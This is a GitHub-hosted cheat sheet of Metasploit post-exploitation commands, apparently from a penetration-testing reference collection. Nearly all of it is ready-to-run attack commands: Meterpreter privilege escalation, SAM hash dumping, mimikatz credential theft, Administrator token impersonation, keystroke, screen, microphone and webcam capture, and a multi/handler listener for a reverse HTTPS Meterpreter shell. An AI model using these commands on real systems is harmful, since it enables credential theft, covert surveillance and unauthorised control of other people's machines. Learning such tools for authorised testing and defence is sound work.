forked from OlivierLaflamme/Cheatsheet-God
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Cheatsheet_MSFPostExploitation.txt
61 lines (46 loc) · 1.96 KB
/
Cheatsheet_MSFPostExploitation.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
[+] Meterpreter Shell
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getsystem
meterpreter > hashdump
meterpreter > load/use mimikatz
kerberos Attempt to retrieve kerberos creds
livessp Attempt to retrieve livessp creds
mimikatz_command Run a custom commannd
msv Attempt to retrieve msv creds (hashes)
ssp Attempt to retrieve ssp creds
tspkg Attempt to retrieve tspkg creds
wdigest Attempt to retrieve wdigest creds
meterpreter > wdigest
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token SERV-2K3\\Administrator
execute -f cmd.exe -i -t
Metasploit Exploit Multi Handler
multi/handler to accept an incoming reverse\_https\_meterpreter
`payload
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
exploit
[*] Started HTTPS reverse handler on https://$ip:443/`
Building Your Own MSF Module
`mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp
/usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
./crossfire.rb
nano crossfire.rb`
Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
`download` Download a file or directory
`upload` Upload a file or directory
`portfwd` Forward a local port to a remote service
`route` View and modify the routing table
`keyscan_start` Start capturing keystrokes
`keyscan_stop` Stop capturing keystrokes
`screenshot` Grab a screenshot of the interactive desktop
`record_mic` Record audio from the default microphone for X seconds
`webcam_snap` Take a snapshot from the specified webcam
`getsystem` Attempt to elevate your privilege to that of local system.
`hashdump` Dumps the contents of the SAM database